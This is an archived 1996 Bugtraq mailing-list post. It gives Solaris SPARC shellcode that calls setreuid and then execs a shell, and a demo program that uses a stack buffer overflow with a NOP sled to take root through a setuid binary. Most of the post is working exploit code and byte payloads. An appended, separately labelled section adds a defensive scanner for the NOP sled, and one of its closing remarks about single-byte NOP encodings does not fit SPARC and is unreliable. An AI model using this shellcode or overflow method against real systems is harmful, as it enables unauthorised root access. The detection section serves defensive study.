Re: /bin/ksh sparc code
daemon@ATHENA.MIT.EDU (Aaron Bornstein)
Tue Dec 3 16:50:11 1996
Date: Tue, 3 Dec 1996 15:18:19 -0500
Reply-To: Aaron Bornstein <aaronb@j51.com>
From: Aaron Bornstein <aaronb@j51.com>
X-To: zomo@home.serome.co.kr
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@netspace.org>
Our good buddy Kichang wrote the following:
> So, I made sparc code for doing something *like* execl("/bin/ksh","ksh",0).
>I know it's no big deal, almost close to lame, but I think it's kinda
That's one way to do it, but I don't like ksh. So, I decided to
modify it to do a setreuid() call before anything else. Here's the code:
--CUT HERE--solaris-setreuid-shellcode.c--CUT HERE--
/* Solaris */
int main(void) {
__asm__ (
"mov 0xca, %g1 \n" /* 202 - setreuid() */
"xor %o1,%o1,%o1 \n"
"and %o1,%o1,%o0 \n"
"ta 8 \n"
"sethi 0xbd89a, %l6 \n"
"or %l6, 0x16e, %l6 \n"
"sethi 0xbdcda, %l7 \n"
"and %sp, %sp, %o0 \n"
"add %sp, 8, %o1 \n"
"xor %o2, %o2, %o2 \n"
"add %sp, 16, %sp \n"
"std %l6, [%sp - 16] \n"
"st %sp, [%sp - 8] \n"
"st %g0, [%sp - 4] \n"
"mov 0x3b, %g1 \n" /* 59 - execve() */
"ta 8 \n"
);
return 0;
}
--CUT HERE--solaris-setreuid-shellcode.c--CUT HERE--
And a demonstration program. Usage:
# cc -o demo demo.c
# chmod 4755 demo
# su plainuser
% ./demo
#
--CUT HERE--solaris-shellcode-example1.c--CUT HERE--
#include <sys/types.h>
#include <string.h> /* strcpy() */
#define NOP 0xa61cc013
#define BUFSIZE 256
#define CODESIZE 64
char shellcode[] =
"\x82\x10\x20\xca\x92\x1a\x40\x09\x90\x0a\x40\x09\x91\xd0\x20\x08"
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
"\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
"\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08";
char bigbuf[BUFSIZE * 2];
/* Returns the current stack pointer. There is no C return statement on
 * purpose: the asm copies %sp into %i0, which is the caller's %o0 (the
 * return register) once the register window is restored. */
u_long
get_sp()
{
__asm__("mov %sp, %i0 \n");
}
void
overflow_me()
{
char lilbuf[BUFSIZE];
u_long *lp;
char *cp;
int i;
/* First part of bigbuf: NOP words */
lp = (u_long *)bigbuf;
for (i = 0 ; i < BUFSIZE - CODESIZE ; i += 4)
*lp++ = NOP;
/* Then the shellcode bytes */
cp = (char *)lp;
for (i = 0 ; i < CODESIZE ; i++)
*cp++ = shellcode[i];
/* Second half of bigbuf: repeated guess for lilbuf's address */
lp = (u_long *)cp;
for (i = BUFSIZE ; i < BUFSIZE * 2 ; i += 4)
/* *lp++ = (u_long)lilbuf; */
*lp++ = get_sp() + 224;
/* bigbuf is twice the size of lilbuf, so this copy runs past it */
strcpy(lilbuf, bigbuf);
}
int
main(void)
{
overflow_me();
return 0;
}
--CUT HERE--solaris-shellcode-example1.c--CUT HERE--
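For anyone on the detection side, here is an added example (mine, not part of Aaron's post or the demo above): a small scanner that looks for the kind of NOP sled the demo builds, i.e. long runs of the SPARC no-op word 0xa61cc013 that the demo's NOP macro uses. SPARC is big-endian, so the word is matched as the byte sequence a6 1c c0 13 at every 4-byte alignment. The alert threshold of 16 consecutive words is an assumption of mine, as is the constructed sample input; the function names are mine as well.

```c
/* Added example (not from the original post): scan a byte buffer for a
 * sled of the SPARC NOP word 0xa61cc013 and report the longest run found. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define SPARC_NOP 0xa61cc013u   /* same value as the demo's NOP macro */
#define SLED_ALERT_WORDS 16     /* assumed threshold: 16 words = 64 bytes of NOPs */

/* Read a 32-bit big-endian word at p (SPARC byte order). */
static uint32_t be32(const unsigned char *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/* Longest run of consecutive SPARC_NOP words, tried at byte offsets 0..3
 * so a sled that does not start on a 4-byte boundary is still found. */
size_t longest_nop_run(const unsigned char *buf, size_t len)
{
    size_t best = 0;
    for (size_t align = 0; align < 4; align++) {
        size_t run = 0;
        for (size_t off = align; off + 4 <= len; off += 4) {
            if (be32(buf + off) == SPARC_NOP) {
                if (++run > best)
                    best = run;
            } else {
                run = 0;
            }
        }
    }
    return best;
}

/* 1 if the buffer carries at least SLED_ALERT_WORDS consecutive NOPs. */
int looks_like_sled(const unsigned char *buf, size_t len)
{
    return longest_nop_run(buf, len) >= SLED_ALERT_WORDS;
}

/* Constructed sample input: `nops` NOP words, then `filler` bytes up to outlen.
 * Returns the number of bytes written (always outlen). */
size_t build_sample(unsigned char *out, size_t outlen, size_t nops, unsigned char filler)
{
    size_t n = 0;
    for (size_t i = 0; i < nops && n + 4 <= outlen; i++) {
        out[n++] = 0xa6; out[n++] = 0x1c; out[n++] = 0xc0; out[n++] = 0x13;
    }
    while (n < outlen)
        out[n++] = filler;
    return n;
}

/* Longest NOP run in a 256-byte constructed sample with `nops` leading NOPs. */
size_t sample_run(size_t nops)
{
    unsigned char s[256];
    size_t n = build_sample(s, sizeof s, nops, 'A');
    return longest_nop_run(s, n);
}

/* Sled verdict for the same constructed sample. */
int sample_is_sled(size_t nops)
{
    unsigned char s[256];
    size_t n = build_sample(s, sizeof s, nops, 'A');
    return looks_like_sled(s, n);
}

int main(void)
{
    printf("48 NOPs then filler: run=%zu sled=%d\n", sample_run(48), sample_is_sled(48));
    printf("filler only:         run=%zu sled=%d\n", sample_run(0), sample_is_sled(0));
    return 0;
}
```

The threshold is deliberately a parameter: the demo fills BUFSIZE - CODESIZE = 192 bytes (48 words) with NOPs, which is well above 16, while short accidental matches in ordinary data stay below it. A real sensor would pair this with the other single-byte NOP encodings the architecture allows, which this example does not cover.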